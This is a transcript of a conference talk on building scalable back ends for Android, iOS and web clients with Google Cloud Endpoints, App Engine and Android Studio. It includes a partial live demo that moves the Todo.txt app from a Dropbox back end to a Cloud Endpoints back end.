We can use the NumPy sqrt() function to get the square root of each element of a matrix.
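This last method has no snippet above, so here is a minimal sketch, assuming NumPy is installed (the sample matrix is my own illustrative data):

```python
import numpy as np

matrix = np.array([[4, 9], [16, 25]])
roots = np.sqrt(matrix)  # element-wise square root of every entry
print(roots)
# [[2. 3.]
#  [4. 5.]]
```

np.sqrt works the same way on any array shape, applying the square root element by element.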
Data::asXML - convert data structures to/from XML
    use Data::asXML;
    my $dxml = Data::asXML->new();
    my $dom = $dxml->encode({
        'some' => 'value',
        'in'   => [ qw(a data structure) ],
    });

    my $data = $dxml->decode(q{
        <HASH>
            <KEY name="some"><VALUE>value</VALUE></KEY>
            <KEY name="in">
                <ARRAY>
                    <VALUE>a</VALUE>
                    <VALUE>data</VALUE>
                    <VALUE>structure</VALUE>
                </ARRAY>
            </KEY>
        </HASH>
    });

    my (%hash1, %hash2);
    $hash1{other}=\%hash2;
    $hash2{other}=\%hash1;
    print Data::asXML->new->encode([1, \%hash1, \%hash2])->toString;

    <ARRAY>
        <VALUE>1</VALUE>
        <HASH>
            <KEY name="other">
                <HASH>
                    <KEY name="other">
                        <HASH href="../../../../*[2]"/>
                    </KEY>
                </HASH>
            </KEY>
        </HASH>
        <HASH href="*[2]/*[1]/*[1]"/>
    </ARRAY>
For more examples see t/01_Data-asXML.t.
experimental, use at your own risk :-)
There are couple of modules mapping XML to data structures. (XML::Compile, XML::TreePP, XML::Simple, ...) but they aim at making data structures adapt to XML structure. This one defines couple of simple XML tags to represent data structures. It makes the serialization to and from XML possible.
For the moment it is an experiment. I plan to use it for passing data structures as DOM to XSLT for transformations, so that I can match them with XPATH similar way how I access them in Perl.
    /HASH/KEY[@name="key"]/VALUE
    /HASH/KEY[@name="key2"]/ARRAY/*[3]/VALUE
    /ARRAY/*[1]/VALUE
    /ARRAY/*[2]/HASH/KEY[@name="key3"]/VALUE
If you are looking for a module to serialize your data, without requirement to do so in XML, you should probably better have a look at JSON::XS or Storable.
(default 1 - true) will insert text nodes to the XML to make the output indented.
(default undef - false)
in case of
In case of encode(), it decodes the resulting XML string back to data and compares the two data structures, to be sure the data can be reconstructed without errors.

In case of decode(), it decodes to data, encodes back to an XML string, and decodes that string back to data; these two data values are then compared.

Both comparisons are done using Test::Deep::NoTest::eq_deeply.
(default undef - false)
Adds an xml:ns attribute to the root element. If namespace is set to 1, the xml:ns will be ; otherwise it will be the value of namespace.
Object constructor.
From structure
$what generates XML::LibXML::Document DOM. Call
->toString to get XML string. For more actions see XML::LibXML.
Takes
$xmlstring and converts to data structure.):
Lars Dɪᴇᴄᴋᴏᴡ 迪拉斯
Emmanuel Rodriguez
* int, float encoding? (string enough?)
* XSD
* anyone else has an idea?
* what to do with blessed? do the same as JSON::XS does?
Please report any bugs or feature requests to
bug-data-asxml at rt.cpan.org, or through the web interface at. I will be notified, and then you'll automatically be notified of progress on your bug as I make changes.
You can find documentation for this module with the perldoc command.
perldoc Data::asXML
You can also look for information at:
This program is free software; you can redistribute it and/or modify it under the terms of either: the GNU General Public License as published by the Free Software Foundation; or the Artistic License.
See for more information. | http://search.cpan.org/~jkutej/Data-asXML-0.07/lib/Data/asXML.pm | CC-MAIN-2017-30 | refinedweb | 523 | 65.42 |
The .NET Languages
What's New in C# 6.0 and VB 14
Of course, you may also need to know many other things such as XAML, Hypertext Markup Language (HTML), Cascading Style Sheets (CSS), TypeScript, JavaScript (and related frameworks), C++, F#, and LightSwitch. Today's developer likely does not code in a single language syntax. However, VB and C# are still at the core of most Visual Studio development.
In this chapter, we set aside the IDE (for the most part) and focus on the foundations of .NET programming in C# and Visual Basic. We start by highlighting new features of the languages for those who are already familiar with C# and VB. We then include a language primer as a review of some basic .NET programming tasks. We then cover some more in-depth programming features, enhancements to C# 6.0 and VB 14, and language-related IDE enhancements. The chapter concludes with an overview and map of the .NET Framework class library.
What’s New in C# 6.0 and VB 14
This section is for developers looking for highlights on what’s new about the C# and Visual Basic languages. For those who need the basics (or a refresher), we suggest you start by reading the “Language Primer” section a little later in this chapter. You can then return here to see what additions exist to the primer.
In general, the language changes are small additions that help you write cleaner code. They simplify coding by eliminating unnecessary, repetitive code. The changes also make the code easier to read and understand.
Null-Conditional Operators
One of the most repetitive tasks you do as a programmer is to check a value for null before you work with it. The code to do this checking is typically all over your application. For example, the following verifies whether properties on an object are null before working with them. (For a more complete discussion of all operators, see the section “Understanding Operators” later in this chapter.)
C#
public bool IsValid()
{
    if (this.Name != null && this.Name.Length > 0
        && this.EmpId != null && this.EmpId.Length > 0)
    {
        return true;
    }
    else
    {
        return false;
    }
}
VB
Public Function IsValid() As Boolean
    If Me.Name IsNot Nothing AndAlso Me.Name.Length > 0 AndAlso
        Me.EmpId IsNot Nothing AndAlso Me.EmpId.Length > 0 Then
        Return True
    Else
        Return False
    End If
End Function
Both C# 6.0 and VB 14 now allow automatic null checking using the question mark dot operator (?.). This operator tells the compiler to check the information that precedes the operator for null. If a null is found in an If statement for example, the entire check is considered false (without additional items being checked). If no null is found, then do the work of the dot (.) to check the value. The code from earlier can now be written as follows:
C#
public bool IsValid()
{
    if (this.Name?.Length > 0 && this.EmpId?.Length > 0)
    {
        return true;
    }
    else
    {
        return false;
    }
}
VB
Public Function IsValid2() As Boolean
    If Me.Name?.Length > 0 AndAlso Me.EmpId?.Length > 0 Then
        Return True
    Else
        Return False
    End If
End Function
The null-conditional operator cleans up code in other ways. For instance, when you trigger events, you are forced to copy the variable and check for null. This can now be written as a single line. The following code shows both the old way and the new way of writing code to trigger events in C#.
C#
//trigger event, old model
{
    var onSave = OnSave;
    if (onSave != null)
    {
        onSave(this, args);
    }
}

//trigger event using null-conditional operator
{
    OnSave?.Invoke(this, args);
}
ReadOnly Auto Properties
Auto properties have been a great addition to .NET development. They simplify the old method of coding properties using a local variable and a full implementation of get and set. See “Creating an Automatically Implemented Property” in the later section “Language Features.”
However, up until 2015, auto properties required both a getter and a setter; this made it hard to use them with immutable data types. The latest release now allows you to create auto properties as read only (with just the get). A read-only backing field is created behind the scenes on your behalf. The following shows an example of a full property, a standard auto property, and the new read-only auto property.
C#
public class Employee
{
    //full property
    private string name;
    public string Name
    {
        get { return name; }
        set { name = value; }
    }

    //standard auto property
    public string Address { get; set; }

    //read-only auto property
    public string EmpId { get; }
}
VB
Public Class Employee
    'full property
    Private _name As String
    Public Property Name() As String
        Get
            Return _name
        End Get
        Set(ByVal value As String)
            _name = value
        End Set
    End Property

    'standard auto property
    Public Property Address As String

    'read-only auto property
    Public ReadOnly Property EmpId As String
End Class
Read-only auto properties can be assigned from the constructor. Again, they have a hidden backing field. The compiler knows this field exists and thus allows this assignment. The following shows a constructor inside the Employee class shown above assigning the read-only EmpId property. Notice that, in Visual Basic, the Sub New constructor must be used to assign a read-only property.
C#
public Employee(string id)
{
    EmpId = id;
}
VB
Public Sub New(ByVal id As String)
    EmpId = id
End Sub
You can also initiate read-only auto properties at the time of their creation (just like the field that backs them), as shown next. Note that if you were to combine this assignment with the previous constructor code (that initialized the read only property), the object creation would happen first. Thus, the constructor init would take precedence.
C#
public string EmpId { get; } = "NOT ASSIGNED";
VB
Public ReadOnly Property EmpId As String = "NOT ASSIGNED"
NameOf Expression
You now have access to the names of your code elements, such as variables and parameters. The .NET languages use the NameOf expression to enable this feature.
Prior to 2015, you often had to indicate the name of a program element by enclosing it in a string. However, if the name of that code element changed, you had an error lurking in your code (unless you managed to remember to change the string value). For example, consider the following code that throws an instance of ArgumentNullException. This class takes a string as the name of the argument. It then uses the string value to find your program element; it’s not strongly typed programming at all.
C#
public void SaveFeedback(string feedback)
{
    if (feedback == null)
    {
        //without nameOf
        throw new ArgumentNullException("feedback");
    }
}
VB
Public Sub SaveFeedback(ByVal feedback As String)
    If feedback Is Nothing Then
        'without nameOf
        Throw New ArgumentNullException("feedback")
    End If
End Sub
The NameOf expression eliminates this issue. You can use the expression along with your actual, scoped code element to pass the name of your code element as a string. However, NameOf uses the actual type to reference the name. Therefore, you get compile-time checking and rename support. The following shows an example of throwing the same exception as used earlier but using NameOf.
C#
throw new ArgumentNullException(nameof(feedback));
VB
Throw New ArgumentNullException(NameOf(feedback))
Using (Imports) Statics
The using statement (Imports in VB) allows developers to declare namespaces that are in scope; thus, classes in the namespace do not need to be fully qualified inside your code. (See "Organizing Your Code with Namespaces" later in this chapter.) You can now use the same statement with static classes. To do so, in C# you must include the static keyword, as in "using static." In Visual Basic, you simply use Imports and then specify the static class.
The ability to indicate using (Imports in VB) with a static class tells the compiler that the class and its members are now in scope. This allows you to call a method of the static class without referencing the namespace or even the class name inside your code.
As an example, consider the static class System.Math. You could add a using statement to the top of your code file. In that case, calls to the static methods would no longer need to be qualified by namespace and class. Instead, you could call the method directly. The following shows the difference between the two approaches.
C#
using static System.Math;
...

//use the static method, round without using
return System.Math.Round(bonus, 0);

//use the static method
return Round(bonus, 0);
VB
Imports System.Math
...

'use the static method, round without imports
Return System.Math.Round(bonus, 0)

'use the static method
Return Round(bonus, 0)
String Interpolation
The .NET languages allow you to replace portions of a string with values. To do so, you use String.Format or StringBuilder.AppendFormat. These methods allow you to use placeholders as numbers inside curly braces. These numbers are replaced in series by the values that follow. This is cumbersome to write and can lead to confusion.
In 2015, the code editor allows you to put the variable right in the middle of the string. You do so using the format that starts the string with a dollar sign ($) as an escape character. You can then add curly braces within the string to reference variables, as in {value}. The editor gives you IntelliSense for your values, too. The call to String.Format then happens for you behind the scenes. The example that follows shows how the previous use of String.Format is now simplified with enhanced string literals.
C#
//old style of String.Format
return String.Format("Name: {0}, Id: {1}", this.Name, this.EmpId);

//string interpolation style
return ($"Name: {this.Name}, Id: {this.EmpId}");
VB
'old style of String.Format
Return String.Format("Name: {0}, Id: {1}", Me.Name, Me.EmpId)

'string interpolation style
Return $"Name: {Name}, Id: {EmpId}"
Lambda Expressions as Methods (C# Only)
Methods, properties, and other bits of code can now be assigned using lambda expression syntax (in C# only). (See “Write Simple Unnamed Functions Within Your Code (Lambda Expressions)” later in this chapter.) This makes writing and reading code much easier. The following shows a full method implementation as a lambda and a single expression. Notice that we use the string interpolation discussed in the prior section.
C#
public override string ToString() => $"Name: {this.Name}, Id: {this.EmpId}";
Index Initializers (C# Only)
Prior language editions brought developers the concept of creating an object and initializing its values at the same time. (See “Object Initializers” later in this chapter.) However, you could not initialize objects that used indexes. Instead, you had to add one value after another, making your code repetitive and hard to read. C# 6.0 supports index initializers. The following shows an example of creating a Dictionary<string, DateTime> object of key/value pairs and initializing values at the same time.
C#
var holidays = new Dictionary<string, DateTime>
{
    ["New Years"] = new DateTime(2015, 1, 1),
    ["Independence Day"] = new DateTime(2015, 7, 4)
};
Reader comments on "How SubString method works in Java - Memory Leak Fixed in JDK 1.7" (javarevisited.blogspot.com):

- Yves Gillet: Beware, the implementation changed in Java 7: substring no longer shares the original char[] array, it creates a new copy of it. What the article refers to as the substring problem was in fact a bug, now fixed, so interviewers should be aware that some of their questions are not valid anymore.
- Dave Conrad: The String(String) constructor has changed between Java 6, 7, and (the early access version of) 8; the bit about stripping out the baggage is no longer in there. If your small sub-string of a large string is in variable "name", what you need to do is: name = new String(name.toCharArray());
- Soumitra Pathak: While debugging you can see that even after substring, the backing array still held all the original content. If you don't want to keep it, use String new2 = new String(new1.toCharArray()); this copies the characters into a fresh backing array.
- Anonymous: How do you search for a given pattern in a string without using regex? E.g., find the total number of occurrences of "aab", and the index of each, in "aabcbbacbaabaaaabbabaab".
Visual Studio, some help please
I want to know if Visual Studio can open an existing script.
Can I open the Superman script, for example, to look at what is inside?
I just want to know how it's built, and I would like to use the laser eyes for myself.
@Necroxide You cannot view the code of compiled scripts in VS. You would have to use a decompiler to get the source code.
@Jitnaught Hex editing would probably work... but that's usually dangerous.
@krashadam Hex editing would work for editing simple things, but to view the source code it's not a good option.
dotPeek is a .NET decompiler which can decompile code back to semi-recognizable code. It's a good idea to use a decimal->hex converter to get back the natives they call.
For .asi scripts and obfuscated .NET scripts you're gonna have to do some more work but maybe other people know what's to be done.
@ikt I would recommend dnSpy. It's basically ILSpy (good source code decompiler) + dotPeek (good UI, debugging, decompile to project, etc). It's also made so it can handle obfuscated assemblies (better). And it's open-source
To get the natives scripts call just make sure ScriptHookVDotNet.dll is in the same folder as the script you're decompiling. dnSpy will automatically get the native names from there.
@Jitnaught Thanks
It helped a lot, I'm new to this.
It worked, but Visual Studio sees the 29AAA / B8AAA type of names as errors. Do you know what that is? Or is it a mistake in the conversion of the files?
using GTA;
using System;
using System.Collections.Generic;
using System.Windows.Forms;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.IO;
using System.Drawing;
using GTA.Math;
using GTA.Native;
namespace CyclopsMOD
{
public class CyclopsMOD : Script
{
public CyclopsMOD()
{
    Tick += Ontick;
    KeyDown += OnKeyDown;
    KeyUp += OnkeyUp;
    Interval = 8;
}

void Ontick(object sender, EventArgs e) { }

void OnKeyDown(object sender, KeyEventArgs e) { }

void OnkeyUp(object sender, KeyEventArgs e)
{
    if (e.KeyCode == Keys.I)
    {
        this.29AAA = World.CreateProp(this.09AAA.Model, THelper.getCreationPos(15.0, 15.0), false, false);
        Script.Wait(0);
        flag = !THelper.Exists(this.29AAA);
        if (!flag)
        {
            this.29AAA = CyclopsMOD.C30A1[0];
            CyclopsMOD.C30A1.RemoveAt(0);
        }
        else
        {
            this.29AAA.IsVisible = false;
            this.29AAA.AttachTo(Game.Player.Character,110A1, 0, Game.Player.Character, 110A1.GetOffsetFromWorldCoords(this,88AAA), Vector3.Zero);
            Vector3 vector = THelper.directionToRotation(Vector3.Normalize(this,09AAA.GetOffsetInWorldCoords(Vector3.RelativeRight) - this,09AAA.GetOffsetInWorldCoords(Vector3.Zero)), 0.0);
            Vector3 vector2;
            vector2.ctor(-2.8f, 0f, 3f);
            Vector3 rot = vector + vector2;
            this.98AA1 = THelper.RotationToDirection(rot);
            Cyclops.B30AA.Add(this);
            double size = 0.08;
            this.B8AAA.Add(THelper.ptfx_startOnEntity(this,29AAA, "proj_laser_player", "core", Vector3.Zero, Vector3.Zero, size,, 0.25,, size, 1.0));
            THelper.ptfx_setColor(this.B8AAA[this.B8AAA.Count - 1], 0.0, 255.0, 0.0);
            this.C8AA1 = DateAndTime.Now;
- It's just a copy of the Superman script pasted into my script project... I'm trying to find the 'animation' light effects and the 'impact' effect on peds, etc.
You must be missing a variable. | https://forums.gta5-mods.com/topic/15670/visual-studion-some-help-please | CC-MAIN-2017-47 | refinedweb | 517 | 53.58 |
TypeName: IdentifiersShouldNotMatchKeywords
CheckId: CA1716
Category: Microsoft.Naming
Breaking Change: Breaking
A namespace name or a type name matches a reserved keyword in a case-insensitive comparison.
Identifiers for namespaces and types should not match keywords defined by languages that target the common language runtime. Depending on the language in use and the keyword, compiler errors and ambiguities can make the library difficult to use. This rule does not check all keywords in all .NET languages.
Select a name that does not appear in the list of keywords.
Do not exclude a warning from this rule. The library might not be usable in all available languages in the .NET Framework.
This rule currently checks against the keywords of Visual Basic, C#, Managed C++, C++/CLI and J# languages.
A case-insensitive comparison is used for Visual Basic keywords and a case-sensitive comparison for the other languages.
.NET Core 1.0 Release — What You Need to Know to Get Started
Wondering what the new .NET Core release has in store for you? Let's take a look...
Join the DZone community and get the full member experience.Join For Free
With the recent release of .NET Core 1.0 and the corresponding MVC framework update for it, many of you may be interested in migrating existing web projects or starting a greenfields one with it. What will soon become apparent is that it’s a pretty huge overhaul and different in many places from MVC 5.
In general, it brings fresh ideas and tooling from the open source world (especially NodeJS) to the Microsoft ecosystem. It’s a fast and intuitive framework that mostly just works (once you figure out the differences.) Aside from the tooling refresh, the fact that it targets all platforms is a win and worth a look for all developers, no matter what ecosystem they hail from.
The fact that C# and the CLR can now be developed on OS X and deployed to Linux is pretty sweet. It’s worth remembering that the new .NET Core 1.0 release is a large change and is quite different. Some old ways will need to be relearned at first, so it’s worth noting how the initial commit of a new .NET Core 1.0 project might look compared to the past.
Setting Up a Local Development Site
.NET Core uses its web server, Kestrel, to serve up CLR code. We are using the traditional IIS workflow to forward requests through to Kestrel. In order for IIS to handle HTTP requests to your .NET Core app code, you’ll need to install the .NET Core Windows Server Hosting bundle. This contains the ASP.NET Core Module and creates a reverse proxy between IIS and the Kestrel server.
Create a Local Dev Website in IIS Like Normal:
- Hit Win+R, open ‘inetmgr’, then right-click Sites -> Add Website.
- Add a site name, e.g. sample.local, and set its physical path to your project's folder (the one with `web.config` in it). Set the host name to a domain such as sample.local.
- Add the above domain to your HOSTS file, pointing it at 127.0.0.1.
The Publishing to IIS documentation is quite useful as it lists all the steps involved. In particular, check out the ‘Common Errors’ section as there are a few possible failure states depending on what you have installed or built, it will also highlight whether or not the various moving parts can locate what they need.
In particular, to debug the config, you’ll want to check these two:
- Enable stdout logging: create a `log/` directory in your project root (where `web.config` is), and set `stdoutLogEnabled` to `true` in the web.config
- Check the Event Viewer: Win+R -> eventvwr then look under Applications.
There is one additional step which involves 'Publishing' the project to generate the assemblies alongside the app code. You can set this target folder to one outside the project, or within it, and point Kestrel at the release folder. Then, you only need to right-click on the project in VS once and click 'Publish', setting its Target Location to File System and `.\bin\Release\PublishOutput`. You can then develop your site in VS. Changes will be reflected upon save, as normal.
After you've published your site, finally point the `aspNetCore` element in web.config at that location. Your line should look something like this:
<aspNetCore processPath="dotnet" arguments=".\bin\release\publishoutput\SampleApp.dll" stdoutLogEnabled="true" stdoutLogFile=".\logs\stdout" forwardWindowsAuthToken="false" />
Use `.\SampleApp.dll` as the arguments value, or if it's a standalone .exe leave it blank.
Finally, run up your domain in a web browser, and start developing! The following is a series of common web development tasks that need to be set up in a new project. They will help you get up to speed with .NET Core 1.0.
Common Client-Side Tasks
Serving Static Content
The default projects have static assets (JS/CSS/images) wired up and ready for routing straight out of the box. These now reside in `wwwroot/` by default, beneath your project directory. Using the Gulp or Grunt plugins to rebuild the assets is the easiest way to develop these. Have them updated upon file saves, either using a file watch or the Task Runner Explorer. The project templates or Yeoman can include these config files (such as `yo aspnet --gulp`). Here's how to set up the workflow from scratch:
- Add the NPM package.json and gulpfile.js or Gruntfile using Add New Item in the Solution Explorer.
- Open up Task Runner Explorer by right-clicking on the Gulp or Grunt config file, then clicking Run on the selected task.
- Add the particular dependencies for Gulp/Grunt.
The project defaults to pointing at the site.css/site.js files if the environment is `Development`, or site.css.min/site.js.min if it's `Staging` or `Production` (case-insensitive). If the environment is pointed at either of the latter two, you'll need to run the Minify tasks with Gulp/Grunt to update the client-side assets. If you're pointed at dev, the assets will update in place.
There are a couple of ways to set the development environment. If you’re running Kestrel from VS, you can set it by right-clicking on the project in VS then going to Debug and setting the ASPNETCORE_ENVIRONMENT value. Alternatively, you can set the same in Properties -> launchSettings.json. If you’re running it in IIS and want to set it in the web.config, you can do this like so:
<aspNetCore ...> <environmentVariables> <environmentVariable name="ASPNETCORE_ENVIRONMENT" value="Development" /> </environmentVariables> </aspNetCore>
Make sure `app.UseStaticFiles();` is present in the Startup.Configure method. There are also richer alternatives available, including UseFileServer, which enables directory browsing (not on by default, as it's a security hole).
Bundling Client-Side Assets in .NET Core 1.0
Once you’ve got one of the above client-side task runners set up, traditional bundling and minification is available using their standard pipelines such as gulp-concat and UglifyJS2 (called using its wrapper libraries). Excellent documentation for this is available here. If you’re up for the more cutting edge client-side package management like Webpack, continue on with the next section.
Client-Side Package Management With Webpack
A more cutting edge approach to the above for development is available. One popularized and especially useful with React applications is Webpack. A NuGet package is available here that supports this from .NET Core 1.0. This gets a development server for Hot Reload for rapid iteration of modules and pages – when code is updated and saved, the changes are immediately reflected in the browser without a static page load.
Webpack is powerful and also provides the ability for production bundles to use async loading of dependencies when they’re needed (‘Hot Reload’ is the killer feature for me).
Common Server-Side Tasks
URL Routing
Fortunately, the URL routing in .NET Core MVC isn't very different from MVC 5. The declarative catch-all routes are now specified in Startup.cs with the `app.UseMvc()` lambda function. The default Controller and Action method routing thus works out of the box as before.
The upshot of this is bog-standard MVC: a FooController that inherits from Controller, with a Bar method that returns an ActionResult and a View(). This will load the view located in `Views\Foo\Bar.cshtml` when /foo/bar is requested by a user agent.
Attribute routing is also supported. The following method will return when ‘/baz’ is requested:
public class FooController : Controller { [Route("/baz")] public ActionResult Bar() { return View(); } }
Areas
Area folders work as before, too, so you can group up related Controllers and Views into sections. For instance when using the default route mapping you can add areas like this:
app.UseMvc(routes => { routes.MapRoute( name: "default", template: "{area=Home}/{controller=Home}/{action=Index}/{id?}"); });
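Controllers then opt into an area with the [Area] attribute (a sketch: the area and controller names here are arbitrary examples, not from the article):

```csharp
[Area("Admin")]
public class HomeController : Controller
{
    // Matches /Admin/Home/Index under the {area}/{controller}/{action} template;
    // the view is looked up in Areas/Admin/Views/Home/Index.cshtml
    public IActionResult Index()
    {
        return View();
    }
}
```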
Logging
The ILoggerFactory that gets passed in to Startup.Configure lets you configure the available logger targets and the verbosity level (with LogLevel) etc.
To log out messages you then accept an instance of `ILogger<T>` where T is the instantiating class type. Storing this in an instance variable then lets you call `_logger.LogDebug()` and similar.
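Putting those two pieces together, a controller might look something like this (a sketch: the controller name and log message are arbitrary, not from the article):

```csharp
public class FooController : Controller
{
    private readonly ILogger<FooController> _logger;

    // ASP.NET Core's DI container supplies the typed logger
    public FooController(ILogger<FooController> logger)
    {
        _logger = logger;
    }

    public IActionResult Bar()
    {
        _logger.LogDebug("Rendering Bar at {Time}", DateTime.UtcNow);
        return View();
    }
}
```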
Rendering Partials
Since the update, if you attempt to render a partial view from a Razor view with `@Html.RenderPartial`, it chokes. The syntax has changed slightly, and the async-await-everywhere API appears to be preferred. The following syntax works correctly instead:
@{await Html.RenderPartialAsync("Partial");}
It’s Over!
We hope you found this post useful and enjoy looking into .NET Core 1.0. Add Raygun Crash Reporting and Pulse to your site after you've got everything up to make sure things run smoothly. Install the NuGet package Mindscape.Raygun4Net.AspNetCore in Visual Studio by right-clicking on your project -> Manage NuGet Packages.
Have questions on the .NET Core 1.0 release and what it means for you? Share your comments!
Published at DZone with permission of a DZone MVB. See the original article here.
Opinions expressed by DZone contributors are their own. | https://dzone.com/articles/net-core-10-release-what-you-need-to-know-to-get-s | CC-MAIN-2022-27 | refinedweb | 1,534 | 68.06 |
Name: krC82822 Date: 06/25/2001
java version "1.4.0-beta"
Java(TM) 2 Runtime Environment, Standard Edition (build 1.4.0-beta-b65)
Java HotSpot(TM) Client VM (build 1.4.0-beta-b65, mixed mode)
The design of the classes related to the new persistence delegation
seems counterproductive and does not match specification at
some points. Some methods have undocumented side effects.
The Encoder class is intended to be a base class for different
Encoder implementations but is mostly designed as if it should never
be subclassed and implemented as if XMLEncoder was the only possible
subclass and if it were a singleton design.
Most important points are:
- Encoder should be abstract
- Encoder should provide abstract methods for the implementors
e.g., a method which is called after writeStatement has
processed it and has created the necessary expressions
-
- getPersistenceDelegate and setPersistenceDelegate are instance
methods but have static effect. These should be either static methods
or have an effect per instance
- getValue(Expression) should be protected not package-private
- clear() should be protected not package-private
- XMLEncoder should not call any package-private methods.
Then it would better match it's role of a reference
implementation of an Encoder and the design flaws would
be detected earlier
- The constructor of XMLEncoder has global side-effects.
BTW the called static method setCaching(boolean) is replacing the cache
by a new HashMap every time it is set to true, even if it was true before
- The flush() method of XMLEncoder has global side-effects
- The toString() method of Statement has global side-effects.
- if other Encoder implementations are using the toString() method of
Statement the target objects are never garbage-collected
- There might be more side-effects
It seems as if the whole code had better be completely rewritten.
The following code can be used to indicate some of the above points.
import java.lang.reflect.*;
import java.beans.*;
import java.io.ByteArrayOutputStream;
import java.util.HashMap;
class TestCase {
public static void main(String[] arg) {
try {
System.out.print("Is getPersistenceDelegate DECLARED static ? ");
Class[] argType=new Class[] {Class.class};
Method m=Encoder.class.getMethod("getPersistenceDelegate",argType);
System.out.println(Modifier.isStatic(m.getModifiers()));
System.out.print("Is the EFFECT of set/getPersistenceDelegate static ? ");
Encoder e1=new XMLEncoder(new ByteArrayOutputStream()),
e2=new XMLEncoder(new ByteArrayOutputStream());
PersistenceDelegate pd=new DefaultPersistenceDelegate();
e1.setPersistenceDelegate(TestCase.class, pd);
System.out.println(e2.getPersistenceDelegate(TestCase.class)==pd);
System.out.println("Writing an object to a debug Encoder");
e1=new Encoder() {
public void writeExpression(Expression ex) {
super.writeExpression(ex);
System.out.println(" Expression: "+ex);
}
};
Object testObj=new java.awt.Point(4,2);
e1.getPersistenceDelegate(testObj.getClass()).writeObject(testObj,e1);
System.out.print("now, are there DANGLING REFERENCES avoiding gc ? ");
Class nameCl=Class.forName("java.beans.NameGenerator");
Field nameFd=nameCl.getDeclaredField("valueToName");
nameFd.setAccessible(true);
HashMap names=(HashMap)nameFd.get(null);
System.out.println(!names.isEmpty());
System.out.println(" "+names.size()+" objects");
if(!names.isEmpty()) {
System.out.print("Does XMLEncoder.flush() have a GLOBAL SIDE-EFFECT"
+" to these references ? ");
((XMLEncoder)e2).flush();
HashMap names2=(HashMap)nameFd.get(null);
System.out.println(!names2.equals(names));
System.out.println(" "+(names2.isEmpty()?"now":"still")
+" contains "+names2.size()+" objects");
}
}
catch(Exception ex) {
System.out.println("\nException occured: "+ex);
System.out.println("Note that this TestCase is specific to version "
+"1.4.0-beta-b65");
}
}
}
(Review ID: 127273)
======================================================================
EVALUATION
Response from Philip Milne follows:
> The Encoder class is intended to be a base class for different
> Encoder implementations but is mostly designed as if it should never
> be subclassed and implemented as if XMLEncoder was the only possible
> subclass and if it were a singleton design.
>
This is a little harsh, the Encoder can in fact be trivially subclassed
to produce a textual (Java-like) output. Granted however, some package
private methods make it very difficult to override some of its features.
Where the problems are a question of exposing methods that are currently
hidden this will probably happen, though it is too late for changes
that are not backward compatible. Its a shame we didn't have you on the
expert group when you could have raised these issues while the design was
taking place last year.
Anyway, to answer your points:
> Most important points are:
>
> - Encoder should be abstract
I'm actually not sure this is better, but it's too late for
this anyway as this would break people.
> - Encoder should provide abstract methods for the implementors
> e.g., a method which is called after writeStatement has
> processed it and has created the nessessary expressions
As above.
> -
Well, although I wouldn't claim the design is perfect, there is
some method to this madness. The Encoder does actually have all the
state it needs to emit a stream of expressions and statements which
will produce the object graph. The XMLEncoder is performing an inherently
more complicated task. It is the structure of the XML and the fact that
expressions are nested in lexical blocks with all operations on an
instance done in one place that requires the extra data structures.
In particular, deciding whether an object needs an explicit ID is
quite difficult to calculate from the graph and requires access to
all the state which is found in the XMLEncoder.
> - getPersistenceDelegate and setPersistenceDelegate are instance
> methods but have static effect. These should be either
> static methods
> or have an effect per instance
Yes, this has been reported as a problem a few times already.
There is a fundamental mismatch here, between the idioms which
the Encoder/Decoder take from the IO package and from the rest
of the beans specification. Basically, a the IO package introduces
the idea of streams which have state - and so we attached the
delegates that we use for controlling persistence to the stream so
that we would be able to support different configurations of encoders
at the same time at some point in the future. Had we made them static
this would never have been possible.
The beans spec and, in particular, the Introspector attach BeanInfo
to classes and this is an inherently static idea. After worrying about
this for some time I made the methods instance methods because
that left us greatest room for expansion in the future and allowed
them to be subclassed. As you have rightly pointed out they currently
affect static data structures in the MetaData class and this is
very confusing. The structures could be made instance specific though
there is always going to be a mismatch between this and BeanInfo
which is, and always will be, a static concept.
> - getValue(Expression) should be protected not package-private
> - clear() should be protected not package-private
Yes this is a good point though once methods are exposed they
can never be deleted; even deprecating methods is pretty difficult
to do in organisations which create public libraries. Given this,
I erred on the side of caution with the API and kept everything hidden
that could be hidden on the grounds that we could expose things if
people asked us to and not the other way around. You're right that
these methods should be made protected at some point at that was
always the intention.
> - XMLEncoder should not call any package-private methods.
> Then it would better match it's role of a reference
> implementation of an Encoder and the design flaws would
> be detected earlier
The XMLEncoder is not really intended to be a reference implementation
for the Encoder. The real purpose of the Encoder is to provide an
API which the persistence delegates can call - thereby isolating
the persistence delegates from the encoding. That it can be subclassed
to make other encoders is (or would be with the changes you suggest)
a useful thing but it is not the main reason for the class. FYI: There
were thoughts of making this class an interface for exactly the reason
above but interfaces cannot be extended over time - and that is the main
reason it is a class. Its API is important, not its implementation here.
That said, it does actually work if you instantiate it and implement the
write() methods using toString(). There's actually very little
(a couple of pages I think) in the Encoder implementation and so a
start-from-scratch implementation might be your best bet in the short
term.
> - The constructor of XMLEncoder has global side-effects.
Yes, though, once again, writing BeanInfo for a class has a global
effect.
> BTW the called static method setCaching(boolean) is replacing the
> cache
> by a new HashMap every time it is set to true, even if it was true
> before
Yes, though this happens rarely enough that it did not show up
at all in our performance tests.
> - The flush() method of XMLEncoder has global side-effects
True, in the NameGenerator. This should be fixed though it only
affects the toString() method which is there for debugging
purposes.
> - The toString() method of Statement has global side-effects
As above.
>.
Good point. I must admit I hadn't paid enough attention to the scenario
in which multiple streams are being used to write the same object graph
to different sinks. I think all of this can be fixed by making the
NameGenerator and co. instance specific; this part of the implementation
is all private.
> - if other Encoder implementations are using the toString()
> method of
> Statement the target objects are never garbage-collected
You mean because the flush method is package private? Yes, this
is also true.
> - There might be more side-effects
>
> It seems as if the whole code should be better completly rewritten.
>
As I say there is very little to the Encoder, most of the work is
in the XMLEncoder and that is there to support a format that you
obviously don't need. I would just do what you say, subclass the
Encoder override all the public methods and replace the two pages
or so of code there with your own implementation.
Its early days for this API and you are the first person I know
of to be trying to produce an entirely new format. If you'd
like to work with Mark to help get all of the features you need
exposed, so that others people would be able to use the API to
produce other formats more easily, then let him know. I expect, if
he has time, he'll try to get them in for FCS.
mark.davidson@Eng 2001-07-25
Many of the issues raised about multi-threaded access to the static caches maintained in NameGenerator and Statement have been resolved as part of the fix for 4880633.
###@###.### 2003-09-22
WORK AROUND
Name: krC82822 Date: 06/25/2001
Do not use multiple XMLEncoder instances at the same time.
Do not create direct instances of Encoder as it makes no sense anyway.
Avoid using get/setPersistenceDelegate until their specification and
implementation match.
If you are implementing an Encoder I suggest using an intermediate class
